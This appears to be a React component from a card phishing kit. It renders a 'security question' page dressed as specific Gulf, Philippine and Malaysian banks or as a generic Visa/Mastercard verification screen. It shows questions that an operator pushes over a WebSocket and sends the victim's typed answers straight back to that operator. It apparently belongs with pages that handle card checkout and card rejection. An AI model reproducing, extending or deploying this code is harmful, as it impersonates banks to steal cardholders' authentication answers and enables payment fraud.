import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function QuestionPage({ config }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardPT';
  const t = getTranslation(mode);
  const [answer, setAnswer] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'standard_visa';

  const isQatar = isQatarBankDesign(design);
  const bank = isQatar ? QATAR_BANKS[design] : null;
  const isMc = isMastercard(design);

  const customQuestion = currentCommand?.message || localStorage.getItem('seq_quest') || t.questionDefaultPrompt;

  const handleSubmit = (e) => {
    e.preventDefault();
    if (answer.trim() && !submitting) {
      setSubmitting(true);
      sendResponse('question_answer', { answer: answer.trim() });
    }
  };

  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isUaeBankDesign(design)) {
    const isWio = design.includes('wio');
    const isFab = design.includes('fab');
    const uaeBank = isFab ? 'fab' : (isWio ? 'wio' : 'adib');
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onExit={() => navigate('/')}
      />
    );
  }

  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isMalaysiaBankDesign(design)) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  if (isKsaBankDesign(design)) {
    return (
      <KsaBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  return (
    <StandardCardLayout
      title={t.questionTitle}
      subtitle={t.questionSubtitle}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <form onSubmit={handleSubmit}>
        <div style={{
          background: '#f9fafb',
          border: '1px solid #e5e7eb',
          borderRadius: '6px',
          padding: '0.85rem 1rem',
          marginBottom: '1rem',
          fontWeight: 600,
          fontSize: '0.88rem',
          color: '#1f2937',
          textAlign: 'center'
        }}>
          {customQuestion}
        </div>

        <input
          type="text"
          value={answer}
          onChange={(e) => setAnswer(e.target.value)}
          placeholder={t.questionPlaceholder}
          className="scl-input"
          style={{ letterSpacing: 'normal', fontSize: '0.95rem' }}
          autoFocus
        />

        <div className="scl-link-row">
          <a
            href="#forgot-answer"
            onClick={(e) => { e.preventDefault(); alert(t.questionForgotAlert); }}
            className="scl-link"
          >
            {t.questionForgotLink}
          </a>
        </div>

        <div className="scl-btn-bar">
          <button
            type="button"
            onClick={() => navigate('/')}
            className="scl-cancel-btn"
          >
            {t.cancelBtn}
          </button>

          <button
            type="submit"
            disabled={!answer.trim() || submitting}
            className="scl-submit-btn"
          >
            {submitting ? <div className="inputLoader" /> : t.submitBtn}
          </button>

          <button
            type="button"
            onClick={() => alert(t.helpAlert)}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {t.helpBtn}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}
